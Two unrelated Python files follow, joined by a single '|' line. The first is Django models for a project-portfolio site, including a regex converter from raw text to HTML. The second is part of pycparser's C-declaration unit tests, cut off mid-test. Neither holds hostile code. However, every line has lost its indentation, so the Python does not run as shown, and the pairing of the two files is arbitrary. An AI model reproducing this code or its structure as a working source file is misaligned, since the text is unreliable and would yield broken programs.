from projects.CustomFileField import CustomFileField
def log(text):
print >>sys.stderr, text
class Category(models.Model): #eg.: Security/Game/Network..
name = models.CharField(max_length=50, help_text=_("Category name"))
name_url = models.CharField(max_length=20, help_text=_("Category name (URL)"))
def __unicode__(self):
return self.name
class Technology(models.Model): #eg.: C/SDL/Java..
name = models.CharField(max_length=50, help_text=_("Technology name"))
name_url = models.CharField(max_length=20, help_text=_("Technology name (URL)"))
parent_technology = models.ForeignKey('self', blank=True, null=True, help_text=_("eg. Python is a parent technology for Django"))
file_extensions = models.CharField(max_length=50, blank=True, null=True, help_text=_("Possible file extensions (eg. 'txt') separated by '|' (eg. 'js|css')"))
def __unicode__(self):
return self.name
class Project(models.Model):
name = models.CharField(max_length=50, help_text=_("Project name"))
name_url = models.CharField(max_length=20, unique=True, help_text=_("Project name (URL)"))
short_description = models.CharField(max_length=155, help_text=_("Short description (max. 155)"))
year = models.IntegerField(help_text=_("Release date"))
private = models.BooleanField(default=True, help_text=_("Private => visible only if logged in"))
category = models.ForeignKey(Category, help_text=_("Category"))
technologies = models.ManyToManyField(Technology, help_text=_("Technologies"))
created = models.DateTimeField(auto_now_add=True, help_text=_("Timestamp of creation"))
modified = models.DateTimeField(auto_now=True, help_text=_("Timestamp of last changes (Project or related objects)"))
def update_technologies(self):
"""
Add missing Technology to the M2M relation
eg. Django => Python
Initially I tried to do it by overloading .save() method of Project
I also tried to put signals listeners on .pre_save and .post_save()
None of these technics worked
"""
update_required = False
technos = list(self.technologies.all())
for techno in technos:
if techno.parent_technology and techno.parent_technology not in technos:
technos.append(techno.parent_technology)
self.technologies.add(techno.parent_technology)
update_required = True
if update_required:
self.save()
def __unicode__(self):
return self.name
def get_absolute_url(self):
"""
Method called during sitemap generation
"""
return reverse('projects.views.show_project', args=[self.year, self.name_url,])
class Meta:
unique_together = ("name_url", "year",)
@receiver(pre_delete, sender=Project, dispatch_uid='project_delete_signal')
def pre_delete_project(sender, instance, using, **kwargs):
"""
Normally these commands should be done by Django itself,
it is just to make sure that everything is deleted properly
"""
instance.download_set.all().delete()
instance.description_set.all().delete()
class Download(models.Model):
def upload_path(self, filename):
if self.project:
return os.path.join('downloads', str(self.project.id), filename)
else:
return os.path.join('downloads', filename)
project = models.ForeignKey(Project, blank=True, null=True, help_text=_("Linked to the project"))
down = models.FileField(upload_to=upload_path, help_text=_("Downloadable file"))
@receiver(pre_delete, sender=Download, dispatch_uid='download_delete_signal')
def pre_delete_download(sender, instance, using, **kwargs):
if os.path.isfile(instance.down.path):
os.remove(instance.down.path)
@receiver(post_save, sender=Download, dispatch_uid='download_save_signal')
def post_save_download(sender, instance, using, **kwargs):
if instance.project:
instance.project.save() #Update modified
class InheritanceCastModel(models.Model):
"""
An abstract base class that provides a ``real_type`` FK to ContentType.
For use in trees of inherited models, to be able to downcast
parent instances to their child types.
"""
real_type = models.ForeignKey(ContentType, editable=False)
def save(self, *args, **kwargs):
if not self.id:
self.real_type = self._get_real_type()
super(InheritanceCastModel, self).save(*args, **kwargs)
def _get_real_type(self):
return ContentType.objects.get_for_model(type(self))
def cast(self):
return self.real_type.get_object_for_this_type(pk=self.pk)
class Meta:
abstract = True
class Code(InheritanceCastModel):
"""
Code is the parent class of
+ SourceCode
+ Repository
Code is linked via SourceToTechnoLines to Technology
the aim of this link is to count the number of lines for a given project
"""
project = models.ForeignKey(Project, help_text=_("Linked to the project"))
upload_time = models.DateTimeField(auto_now_add=True)
exclude_paths = models.TextField(blank=True, null=True, help_text=_("Paths to exclude, one per line (eg.: */static/bootstrap/*)"))
lines_ready = models.BooleanField(default=False, help_text=_("Lines ready == True => the lines of that instance have already been counted"))
# class Meta:
# abstract = True
# not used for simplicity in relationships between table. More precise explanation is given on Description (class) bellow
class Meta:
ordering = ["-upload_time",]
class SourceCode(Code):
"""
Source Code objects store the source code of a given project (tar.gz/zip file extension)
Its content should be accessible only by authentificated people
"""
def upload_path(self, filename):
if filename.endswith(".zip"):
return os.path.join('sourcecode', str(self.project.id), '%s_%d.zip' % (filename[:-4], self.project.code_set.count()))
return os.path.join('sourcecode', str(self.project.id), '%s_%d.tar.gz' % (filename[:-7], self.project.code_set.count()))
archive = CustomFileField(upload_to=upload_path, file_extensions=["tar.gz", "zip"], help_text=_("Source Code (*.tar.gz/*.zip) of your project"))
def __unicode__(self):
return self.archive.name
class Repository(Code):
"""
Details concerning a repository
A cron task can then updates the number of lines automatically without having to update an archive (SourceCode)
"""
SOFT_CHOICES = (
("git", "Git"),
("hg", "Mercurial"),
("zip", "ZIP-ball, TAR.GZ-ball"),
)
url = models.URLField(max_length=200, help_text=_("URL of the repository"))
software = models.CharField(max_length=3, choices=SOFT_CHOICES, help_text=_("Which distributed revision control tool?"))
def __unicode__(self):
return "%s [%s]" % (self.url, self.software)
class SourceToTechnoLines(models.Model):
"""
Number of lines for a given (Code, Technology) pair
"""
code = models.ForeignKey(Code, help_text=_("Code described"))
technology = models.ForeignKey(Technology, help_text=_("Technology concerned"))
num_lines = models.IntegerField(help_text=_("Number of lines of a given technology in a code"))
def __unicode__(self):
return "%d lines of %s" % (self.num_lines, self.technology.name)
class Meta:
# A given pair cannot have several values for num_lines
unique_together = ("code", "technology")
class Description(InheritanceCastModel):
project = models.ForeignKey(Project, help_text=_("Project"))
position = models.IntegerField(default=0, help_text=_("Description's position (the smallest at the top, default value implies last one)"))
data_anchor = models.CharField(max_length=50, blank=True, null=True, help_text=_("Data-anchor value (used to generate the wavy-menu) - optional"))
created = models.DateTimeField(auto_now_add=True, help_text=_("Timestamp of creation"))
modified = models.DateTimeField(auto_now=True, help_text=_("Timestamp of last changes"))
def save(self, *args, **kwargs):
"""
Auto-defined position value, if not defined (or =0)
"""
if not self.position:
try:
self.position = Description.objects.filter(project=self.project).order_by("-position")[0].position +1
except:
self.position = 1
super(Description, self).save(*args, **kwargs)
def get_safe_html(self):
"""
Return a mark_safe string
displaying the description
"""
subclass = self.cast()
escaped_text = subclass.get_safe_html()
# Add data-anchor to paragraphs
if self.data_anchor and len(self.data_anchor) > 0:
escaped_text = re.sub(r'^<(?P<details>[^>]+)>', '<\g<details> data-anchor="%s">' % self.data_anchor, escaped_text)
return mark_safe(escaped_text)
class Meta:
# Option abstract is not in use. Otherwise we would have one relation table for each child of that class
# that is to say: projects_rawtextdescription, projects_htmlcodedescription, projects_imagedescription
# instead of: projects_description
# abstract = True
ordering = ["position"]
@receiver(post_save, sender=Description, dispatch_uid='description_save_signal')
def post_save_description(sender, instance, using, **kwargs):
instance.project.save() #Update modified
class RawTextDescription(Description):
description = models.TextField(help_text=_("Description - Raw Text"))
description_html = models.TextField(help_text=_("HTML code automatically generated"))
def rawtext_to_html(self):
"""
This templatetag converts every url in text to an hyperlink.
The text is escaped for HTML before adding hyperlinks.
URL to link/image
-----------------
INPUT: need to start with a space or new line..
Please visit: http://portfolio.dubien.me/
OUTPUT:
<p>Please visit: <a href="http://portfolio.dubien.me/" target="blank_">http://portfolio.dubien.me/</a></p>
INPUT:

OUTPUT:
<p><img src="http://portfolio.dubien.me/favicon.ico" alt="my favicon" class="image_from_rawtext" /></p>
INPUT:
[Click here](http://portfolio.dubien.me/) to try it!
OUTPUT:
<p><a href="http://portfolio.dubien.me/" target="blank_">Click here</a> to try it!</p>
Bulletpoints to list
--------------------
INPUT:
This is a list:
+ element 1
+ element 2
OUTPUT:
<p>This is a list:</p><ul><li>element 1</li><li>element 2</li></ul>
INPUT:
This is a list:
+ 1
+ + 1.1
+ + 1.2
+ 2
Output:
<p>This is a list:</p><ul><li>1<ul><li>1.1</li><li>1.2</li></ul></li><li>2</li></ul>
Italic/Bold
-----------
INPUT:
This text is *italic* and this one **bold**.
OUTPUT:
<p>This text is <em>italic</em> and this one <strong>bold</strong>.</p>
"""
parent = super(RawTextDescription, self)
escaped_text = escape(self.description)
# URL to link/image
escaped_text = re.sub(r'(?P<begin>^|\n|\s)(?P<url>http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)', '\g<begin><a href="\g<url>" target="blank_">\g<url></a>', escaped_text)
escaped_text = re.sub(r'!\[(?P<alt>[^\]]*)\]\((?P<url>http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)\)', '<img src="\g<url>" alt="\g<alt>" class="image_from_rawtext" />', escaped_text)
escaped_text = re.sub(r'\[(?P<title>[^\]]+)\]\((?P<url>http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)\)', '<a href="\g<url>" target="blank_">\g<title></a>', escaped_text)
# Bulletpoints to list
before = escaped_text
escaped_text = re.sub(r'\n\+\s(?P<li_element>[^\n]+)', '</p><ul><li>\g<li_element></li></ul><p>', escaped_text).replace('</ul><p></p><ul>', '')
# Other levels for bulletpoints
while before != escaped_text:
before = escaped_text
# pattern: <li>+ xxxxxxxxx</li>
# < cannot be find in the original text (escaped)
escaped_text = re.sub(r'<li>\+\s(?P<li_element>[^<]+)</li>', '<ul><li>\g<li_element></li></ul>', escaped_text).replace('</ul><ul>', '')
# This part computes the corresponding valid syntax for nested lists
# the current value of escaped_text should already be fine for most of the browsers
# We will get something like:
# <ul><li>1</li><ul><li>1.1</li></ul></ul>
# instead of:
# <ul><li>1<ul><li>1.1</li></ul></li></ul>
escaped_text = re.sub(r'</li><ul>(?P<li_elements>.+)</ul>', '<ul>\g<li_elements></ul></li>', escaped_text)
# or:
# <ul><ul><li>1.1</li></ul></ul>
# instead of:
# <ul><li><ul><li>1.1</li></ul></li></ul>
escaped_text = re.sub(r'<ul><ul>(?P<li_elements>.+)</ul>', '<ul><li><ul>\g<li_elements></ul></li>', escaped_text)
del before
if escaped_text.endswith("<p>"):
escaped_text = escaped_text[:-3]
else:
escaped_text += "</p>"
if escaped_text.startswith("</p>"):
escaped_text = escaped_text[4:]
else:
escaped_text = "<p>%s" % escaped_text
# Italic/Bold
escaped_text = re.sub(r'\*\*(?P<text>[^(\*\<\n)]+)\*\*', '<strong>\g<text></strong>', escaped_text)
escaped_text = re.sub(r'\*(?P<text>[^(\*\<\n)]+)\*', '<em>\g<text></em>', escaped_text)
return escaped_text
def save(self, *args, **kwargs):
"""
Redefinite .save() method of RawTextDescription
Automatically generates description_html when saving an object
"""
self.description_html = self.rawtext_to_html()
super(RawTextDescription, self).save(*args, **kwargs)
def get_safe_html(self, parent=None):
"""
Return the HTML description
if not generated (possible with older versions) generate it and save it
"""
if self.description and not self.description_html:
self.save() # save will call rawtext_to_html
return self.description_html
@receiver(post_save, sender=RawTextDescription, dispatch_uid='rawtextdescription_save_signal')
def post_save_rawtextdescription(sender, instance, using, **kwargs):
instance.project.save() #Update modified
class HtmlCodeDescription(Description):
description = models.TextField(help_text=_("Description - Html Code"))
def get_safe_html(self, parent=None):
return self.description
@receiver(post_save, sender=HtmlCodeDescription, dispatch_uid='htmlcodedescription_save_signal')
def post_save_htmlcodedescription(sender, instance, using, **kwargs):
instance.project.save() #Update modified
class ImageDescription(Description):
def upload_path(self, filename):
parent = super(ImageDescription, self)
return os.path.join('description', str(parent.project.id), filename)
image = models.ImageField(upload_to=upload_path, help_text=_("Image"))
legend = models.CharField(max_length=150, help_text=_("Image legend"))
def get_safe_html(self):
return """<p class="image"><img src="/media/%s" alt="%s" /><br/><span class="legend">%s</span></p>""" % (escape(self.image), escape(self.legend), escape(self.legend))
@receiver(post_save, sender=ImageDescription, dispatch_uid='imagedescription_save_signal')
def post_save_imagedescription(sender, instance, using, **kwargs):
instance.project.save() #Update modified
@receiver(pre_delete, sender=ImageDescription, dispatch_uid='imagedescription_delete_signal')
def pre_delete_imagedescription(sender, instance, using, **kwargs):
if os.path.isfile(instance.image.path):
os.remove(instance.image.path)
|
|
#!/usr/bin/env python
import pprint
import re
import os, sys
import unittest
sys.path.insert(0, '..')
from pycparser import c_parser
from pycparser.c_ast import *
from pycparser.c_parser import CParser, Coord, ParseError
_c_parser = c_parser.CParser(
lex_optimize=False,
yacc_debug=True,
yacc_optimize=False,
yacctab='yacctab')
def expand_decl(decl):
""" Converts the declaration into a nested list.
"""
typ = type(decl)
if typ == TypeDecl:
return ['TypeDecl', expand_decl(decl.type)]
elif typ == IdentifierType:
return ['IdentifierType', decl.names]
elif typ == ID:
return ['ID', decl.name]
elif typ in [Struct, Union]:
decls = [expand_decl(d) for d in decl.decls or []]
return [typ.__name__, decl.name, decls]
else:
nested = expand_decl(decl.type)
if typ == Decl:
if decl.quals:
return ['Decl', decl.quals, decl.name, nested]
else:
return ['Decl', decl.name, nested]
elif typ == Typename: # for function parameters
if decl.quals:
return ['Typename', decl.quals, nested]
else:
return ['Typename', nested]
elif typ == ArrayDecl:
dimval = decl.dim.value if decl.dim else ''
return ['ArrayDecl', dimval, nested]
elif typ == PtrDecl:
return ['PtrDecl', nested]
elif typ == Typedef:
return ['Typedef', decl.name, nested]
elif typ == FuncDecl:
if decl.args:
params = [expand_decl(param) for param in decl.args.params]
else:
params = []
return ['FuncDecl', params, nested]
def expand_init(init):
""" Converts an initialization into a nested list
"""
typ = type(init)
if typ == NamedInitializer:
des = [expand_init(dp) for dp in init.name]
return (des, expand_init(init.expr))
elif typ == ExprList:
return [expand_init(expr) for expr in init.exprs]
elif typ == Constant:
return ['Constant', init.type, init.value]
elif typ == ID:
return ['ID', init.name]
class TestCParser_base(unittest.TestCase):
def parse(self, txt, filename=''):
return self.cparser.parse(txt, filename)
def setUp(self):
self.cparser = _c_parser
class TestCParser_fundamentals(TestCParser_base):
def get_decl(self, txt, index=0):
""" Given a source and an index returns the expanded
declaration at that index.
FileAST holds a list of 'external declarations'.
index is the offset of the desired declaration in that
list.
"""
t = self.parse(txt).ext[index]
return expand_decl(t)
def get_decl_init(self, txt, index=0):
""" Returns the expanded initializer of the declaration
at index.
"""
t = self.parse(txt).ext[index]
return expand_init(t.init)
def test_FileAST(self):
t = self.parse('int a; char c;')
self.failUnless(isinstance(t, FileAST))
self.assertEqual(len(t.ext), 2)
# empty file
t2 = self.parse('')
self.failUnless(isinstance(t2, FileAST))
self.assertEqual(len(t2.ext), 0)
# First statement empty
t = self.parse('; char c;')
self.assertEqual(len(t.ext), 1)
def test_empty_toplevel_decl(self):
code = 'int foo;;'
t = self.parse(code)
self.failUnless(isinstance(t, FileAST))
self.assertEqual(len(t.ext), 1)
self.assertEqual(self.get_decl(code),
['Decl', 'foo',
['TypeDecl', ['IdentifierType', ['int']]]])
def assert_coord(self, node, line, file=None):
self.assertEqual(node.coord.line, line)
if file:
self.assertEqual(node.coord.file, file)
def test_coords(self):
""" Tests the "coordinates" of parsed elements - file
name and line numbers, with modification insterted by
#line directives.
"""
self.assert_coord(self.parse('int a;').ext[0], 1)
t1 = """
int a;
int b;\n\n
int c;
"""
f1 = self.parse(t1, filename='test.c')
self.assert_coord(f1.ext[0], 2, 'test.c')
self.assert_coord(f1.ext[1], 3, 'test.c')
self.assert_coord(f1.ext[2], 6, 'test.c')
t1_1 = '''
int main() {
k = p;
printf("%d", b);
return 0;
}'''
f1_1 = self.parse(t1_1, filename='test.c')
self.assert_coord(f1_1.ext[0].body.block_items[0], 3, 'test.c')
self.assert_coord(f1_1.ext[0].body.block_items[1], 4, 'test.c')
t1_2 = '''
int main () {
int p = (int) k;
}'''
f1_2 = self.parse(t1_2, filename='test.c')
# make sure that the Cast has a coord (issue 23)
self.assert_coord(f1_2.ext[0].body.block_items[0].init, 3, 'test.c')
t2 = """
#line 99
int c;
"""
self.assert_coord(self.parse(t2).ext[0], 99)
t3 = """
int dsf;
char p;
#line 3000 "in.h"
char d;
"""
f3 = self.parse(t3, filename='test.c')
self.assert_coord(f3.ext[0], 2, 'test.c')
self.assert_coord(f3.ext[1], 3, 'test.c')
self.assert_coord(f3.ext[2], 3000, 'in.h')
t4 = """
#line 20 "restore.h"
int maydler(char);
#line 30 "includes/daween.ph"
long j, k;
#line 50000
char* ro;
"""
f4 = self.parse(t4, filename='myb.c')
self.assert_coord(f4.ext[0], 20, 'restore.h')
self.assert_coord(f4.ext[1], 30, 'includes/daween.ph')
self.assert_coord(f4.ext[2], 30, 'includes/daween.ph')
self.assert_coord(f4.ext[3], 50000, 'includes/daween.ph')
t5 = """
int
#line 99
c;
"""
self.assert_coord(self.parse(t5).ext[0], 99)
def test_simple_decls(self):
self.assertEqual(self.get_decl('int a;'),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['int']]]])
self.assertEqual(self.get_decl('unsigned int a;'),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['unsigned', 'int']]]])
self.assertEqual(self.get_decl('_Bool a;'),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['_Bool']]]])
self.assertEqual(self.get_decl('float _Complex fcc;'),
['Decl', 'fcc', ['TypeDecl', ['IdentifierType', ['float', '_Complex']]]])
self.assertEqual(self.get_decl('char* string;'),
['Decl', 'string',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]])
self.assertEqual(self.get_decl('long ar[15];'),
['Decl', 'ar',
['ArrayDecl', '15',
['TypeDecl', ['IdentifierType', ['long']]]]])
self.assertEqual(self.get_decl('long long ar[15];'),
['Decl', 'ar',
['ArrayDecl', '15',
['TypeDecl', ['IdentifierType', ['long', 'long']]]]])
self.assertEqual(self.get_decl('unsigned ar[];'),
['Decl', 'ar',
['ArrayDecl', '',
['TypeDecl', ['IdentifierType', ['unsigned']]]]])
self.assertEqual(self.get_decl('int strlen(char* s);'),
['Decl', 'strlen',
['FuncDecl',
[['Decl', 's',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]],
['TypeDecl', ['IdentifierType', ['int']]]]])
self.assertEqual(self.get_decl('int strcmp(char* s1, char* s2);'),
['Decl', 'strcmp',
['FuncDecl',
[ ['Decl', 's1',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]],
['Decl', 's2',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]
],
['TypeDecl', ['IdentifierType', ['int']]]]])
def test_nested_decls(self): # the fun begins
self.assertEqual(self.get_decl('char** ar2D;'),
['Decl', 'ar2D',
['PtrDecl', ['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]])
self.assertEqual(self.get_decl('int (*a)[1][2];'),
['Decl', 'a',
['PtrDecl',
['ArrayDecl', '1',
['ArrayDecl', '2',
['TypeDecl', ['IdentifierType', ['int']]]]]]])
self.assertEqual(self.get_decl('int *a[1][2];'),
['Decl', 'a',
['ArrayDecl', '1',
['ArrayDecl', '2',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['int']]]]]]])
self.assertEqual(self.get_decl('char ***ar3D[40];'),
['Decl', 'ar3D',
['ArrayDecl', '40',
['PtrDecl', ['PtrDecl', ['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]]]])
self.assertEqual(self.get_decl('char (***ar3D)[40];'),
['Decl', 'ar3D',
['PtrDecl', ['PtrDecl', ['PtrDecl',
['ArrayDecl', '40', ['TypeDecl', ['IdentifierType', ['char']]]]]]]])
self.assertEqual(self.get_decl('int (*x[4])(char, int);'),
['Decl', 'x',
['ArrayDecl', '4',
['PtrDecl',
['FuncDecl',
[ ['Typename', ['TypeDecl', ['IdentifierType', ['char']]]],
['Typename', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]]])
self.assertEqual(self.get_decl('char *(*(**foo [][8])())[];'),
['Decl', 'foo',
['ArrayDecl', '',
['ArrayDecl', '8',
['PtrDecl', ['PtrDecl',
['FuncDecl',
[],
['PtrDecl',
['ArrayDecl', '',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['char']]]]]]]]]]]])
# explore named and unnamed function pointer parameters,
# with and without qualifiers
#
# unnamed w/o quals
self.assertEqual(self.get_decl('int (*k)(int);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Typename', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# unnamed w/ quals
self.assertEqual(self.get_decl('int (*k)(const int);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Typename', ['const'], ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# named w/o quals
self.assertEqual(self.get_decl('int (*k)(int q);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Decl', 'q', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# named w/ quals
self.assertEqual(self.get_decl('int (*k)(const volatile int q);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Decl', ['const', 'volatile'], 'q',
['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
# restrict qualifier
self.assertEqual(self.get_decl('int (*k)(restrict int* q);'),
['Decl', 'k',
['PtrDecl',
['FuncDecl',
[['Decl', ['restrict'], 'q',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['int']]]]]],
['TypeDecl', ['IdentifierType', ['int']]]]]])
def test_qualifiers_storage_specifiers(self):
def assert_qs(txt, index, quals, storage):
d = self.parse(txt).ext[index]
self.assertEqual(d.quals, quals)
self.assertEqual(d.storage, storage)
assert_qs("extern int p;", 0, [], ['extern'])
assert_qs("const long p = 6;", 0, ['const'], [])
d1 = "static const int p, q, r;"
for i in range(3):
assert_qs(d1, i, ['const'], ['static'])
d2 = "static char * const p;"
assert_qs(d2, 0, [], ['static'])
pdecl = self.parse(d2).ext[0].type
self.failUnless(isinstance(pdecl, PtrDecl))
self.assertEqual(pdecl.quals, ['const'])
def test_sizeof(self):
e = """
void foo()
{
int a = sizeof k;
int b = sizeof(int);
int c = sizeof(int**);;
char* p = "just to make sure this parses w/o error...";
int d = sizeof(int());
}
"""
compound = self.parse(e).ext[0].body
s1 = compound.block_items[0].init
self.assertTrue(isinstance(s1, UnaryOp))
self.assertEqual(s1.op, 'sizeof')
self.assertTrue(isinstance(s1.expr, ID))
self.assertEqual(s1.expr.name, 'k')
s2 = compound.block_items[1].init
self.assertEqual(expand_decl(s2.expr),
['Typename', ['TypeDecl', ['IdentifierType', ['int']]]])
s3 = compound.block_items[2].init
self.assertEqual(expand_decl(s3.expr),
['Typename',
['PtrDecl',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['int']]]]]])
# The C99 compound literal feature
#
def test_compound_literals(self):
ps1 = self.parse(r'''
void foo() {
p = (long long){k};
tc = (struct jk){.a = {1, 2}, .b[0] = t};
}''')
compound = ps1.ext[0].body.block_items[0].rvalue
self.assertEqual(expand_decl(compound.type),
['Typename', ['TypeDecl', ['IdentifierType', ['long', 'long']]]])
self.assertEqual(expand_init(compound.init),
[['ID', 'k']])
compound = ps1.ext[0].body.block_items[1].rvalue
self.assertEqual(expand_decl(compound.type),
['Typename', ['TypeDecl', ['Struct', 'jk', []]]])
self.assertEqual(expand_init(compound.init),
[
([['ID', 'a']], [['Constant', 'int', '1'], ['Constant', 'int', '2']]),
([['ID', 'b'], ['Constant', 'int', '0']], ['ID', 't'])])
def test_enums(self):
e1 = "enum mycolor op;"
e1_type = self.parse(e1).ext[0].type.type
self.assertTrue(isinstance(e1_type, Enum))
self.assertEqual(e1_type.name, 'mycolor')
self.assertEqual(e1_type.values, None)
e2 = "enum mysize {large=20, small, medium} shoes;"
e2_type = self.parse(e2).ext[0].type.type
self.assertTrue(isinstance(e2_type, Enum))
self.assertEqual(e2_type.name, 'mysize')
e2_elist = e2_type.values
self.assertTrue(isinstance(e2_elist, EnumeratorList))
for e2_eval in e2_elist.enumerators:
self.assertTrue(isinstance(e2_eval, Enumerator))
self.assertEqual(e2_elist.enumerators[0].name, 'large')
self.assertEqual(e2_elist.enumerators[0].value.value, '20')
self.assertEqual(e2_elist.enumerators[2].name, 'medium')
self.assertEqual(e2_elist.enumerators[2].value, None)
# enum with trailing comma (C99 feature)
e3 = """
enum
{
red,
blue,
green,
} color;
"""
e3_type = self.parse(e3).ext[0].type.type
self.assertTrue(isinstance(e3_type, Enum))
e3_elist = e3_type.values
self.assertTrue(isinstance(e3_elist, EnumeratorList))
for e3_eval in e3_elist.enumerators:
self.assertTrue(isinstance(e3_eval, Enumerator))
self.assertEqual(e3_elist.enumerators[0].name, 'red')
self.assertEqual(e3_elist.enumerators[0].value, None)
self.assertEqual(e3_elist.enumerators[1].name, 'blue')
self.assertEqual(e3_elist.enumerators[2].name, 'green')
def test_typedef(self):
# without typedef, error
s1 = """
node k;
"""
self.assertRaises(ParseError, self.parse, s1)
# now with typedef, works
s2 = """
typedef void* node;
node k;
"""
ps2 = self.parse(s2)
self.assertEqual(expand_decl(ps2.ext[0]),
['Typedef', 'node',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['void']]]]])
self.assertEqual(expand_decl(ps2.ext[1]),
['Decl', 'k',
['TypeDecl', ['IdentifierType', ['node']]]])
s3 = """
typedef int T;
typedef T *pT;
pT aa, bb;
"""
ps3 = self.parse(s3)
self.assertEqual(expand_decl(ps3.ext[3]),
['Decl', 'bb',
['TypeDecl', ['IdentifierType', ['pT']]]])
s4 = '''
typedef char* __builtin_va_list;
typedef __builtin_va_list __gnuc_va_list;
'''
ps4 = self.parse(s4)
self.assertEqual(expand_decl(ps4.ext[1]),
['Typedef', '__gnuc_va_list',
['TypeDecl',
['IdentifierType', ['__builtin_va_list']]]])
s5 = '''typedef struct tagHash Hash;'''
ps5 = self.parse(s5)
self.assertEqual(expand_decl(ps5.ext[0]),
['Typedef', 'Hash', ['TypeDecl', ['Struct', 'tagHash', []]]])
def test_struct_union(self):
s1 = """
struct {
int id;
char* name;
} joe;
"""
self.assertEqual(expand_decl(self.parse(s1).ext[0]),
['Decl', 'joe',
['TypeDecl', ['Struct', None,
[ ['Decl', 'id',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'name',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['char']]]]]]]]])
s2 = """
struct node p;
"""
self.assertEqual(expand_decl(self.parse(s2).ext[0]),
['Decl', 'p',
['TypeDecl', ['Struct', 'node', []]]])
s21 = """
union pri ra;
"""
self.assertEqual(expand_decl(self.parse(s21).ext[0]),
['Decl', 'ra',
['TypeDecl', ['Union', 'pri', []]]])
s3 = """
struct node* p;
"""
self.assertEqual(expand_decl(self.parse(s3).ext[0]),
['Decl', 'p',
['PtrDecl',
['TypeDecl', ['Struct', 'node', []]]]])
s4 = """
struct node;
"""
self.assertEqual(expand_decl(self.parse(s4).ext[0]),
['Decl', None,
['Struct', 'node', []]])
s5 = """
union
{
struct
{
int type;
} n;
struct
{
int type;
int intnode;
} ni;
} u;
"""
self.assertEqual(expand_decl(self.parse(s5).ext[0]),
['Decl', 'u',
['TypeDecl',
['Union', None,
[['Decl', 'n',
['TypeDecl',
['Struct', None,
[['Decl', 'type',
['TypeDecl', ['IdentifierType', ['int']]]]]]]],
['Decl', 'ni',
['TypeDecl',
['Struct', None,
[['Decl', 'type',
['TypeDecl', ['IdentifierType', ['int']]]],
['Decl', 'intnode',
['TypeDecl', ['IdentifierType', ['int']]]]]]]]]]]])
s6 = """
typedef struct foo_tag
{
void* data;
} foo, *pfoo;
"""
s6_ast = self.parse(s6)
self.assertEqual(expand_decl(s6_ast.ext[0]),
['Typedef', 'foo',
['TypeDecl',
['Struct', 'foo_tag',
[['Decl', 'data',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['void']]]]]]]]])
self.assertEqual(expand_decl(s6_ast.ext[1]),
['Typedef', 'pfoo',
['PtrDecl',
['TypeDecl',
['Struct', 'foo_tag',
[['Decl', 'data',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['void']]]]]]]]]])
s7 = r"""
struct _on_exit_args {
void * _fnargs[32];
void * _dso_handle[32];
long _fntypes;
#line 77 "D:\eli\cpp_stuff\libc_include/sys/reent.h"
long _is_cxa;
};
"""
s7_ast = self.parse(s7, filename='test.c')
self.assert_coord(s7_ast.ext[0].type.decls[2], 6, 'test.c')
self.assert_coord(s7_ast.ext[0].type.decls[3], 78,
r'D:\eli\cpp_stuff\libc_include/sys/reent.h')
s8 = """
typedef enum tagReturnCode {SUCCESS, FAIL} ReturnCode;
typedef struct tagEntry
{
char* key;
char* value;
} Entry;
typedef struct tagNode
{
Entry* entry;
struct tagNode* next;
} Node;
typedef struct tagHash
{
unsigned int table_size;
Node** heads;
} Hash;
"""
s8_ast = self.parse(s8)
self.assertEqual(expand_decl(s8_ast.ext[3]),
['Typedef', 'Hash',
['TypeDecl', ['Struct', 'tagHash',
[['Decl', 'table_size',
['TypeDecl', ['IdentifierType', ['unsigned', 'int']]]],
['Decl', 'heads',
['PtrDecl', ['PtrDecl', ['TypeDecl', ['IdentifierType', ['Node']]]]]]]]]])
def test_anonymous_struct_union(self):
s1 = """
union
{
union
{
int i;
long l;
};
struct
{
int type;
int intnode;
};
} u;
"""
self.assertEqual(expand_decl(self.parse(s1).ext[0]),
['Decl', 'u',
['TypeDecl',
['Union', None,
[['Decl', None,
['Union', None,
[['Decl', 'i',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'l',
['TypeDecl',
['IdentifierType', ['long']]]]]]],
['Decl', None,
['Struct', None,
[['Decl', 'type',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'intnode',
['TypeDecl',
['IdentifierType', ['int']]]]]]]]]]])
s2 = """
struct
{
int i;
union
{
int id;
char* name;
};
float f;
} joe;
"""
self.assertEqual(expand_decl(self.parse(s2).ext[0]),
['Decl', 'joe',
['TypeDecl',
['Struct', None,
[['Decl', 'i',
